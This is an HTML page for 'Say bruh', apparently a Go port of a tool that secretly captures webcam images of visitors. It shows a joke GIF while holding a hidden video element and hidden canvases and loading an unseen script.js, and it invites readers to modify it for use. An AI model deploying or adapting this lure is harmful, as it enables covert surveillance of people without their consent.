<!DOCTYPE html>
<html lang="en">

<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Say bruh</title>
	
	<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js">

	</script>
	<link rel="stylesheet" href="style.css">

</head>

<body>
	<div id = "aboutUs">	<p align ="center">
		<h1 >Say bruh 🤑</h1>
		<h2 >this is a <a href="https://github.com/hangetzzu/saycheese">saycheese</a> version with golang </h2>
		<h2>
			modify the html and another things for use this
		</h2>
		<h2>
			source on <a href="https://github.com/ranon-rat/sayBruh">github</a>
		</h2>
			<p>

				<img src="https://media.giphy.com/media/VIOkcgpsnA2Zy/200.gif"style="width:600px;height:500px;">	
			</p>
			
			
		</div>
<!-- Stream video via webcam -->
<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="480"></canvas>
<script src="script.js">

</script>

<canvas id="canvas" width="640" height="480"></canvas> 
  
</body>
</html>
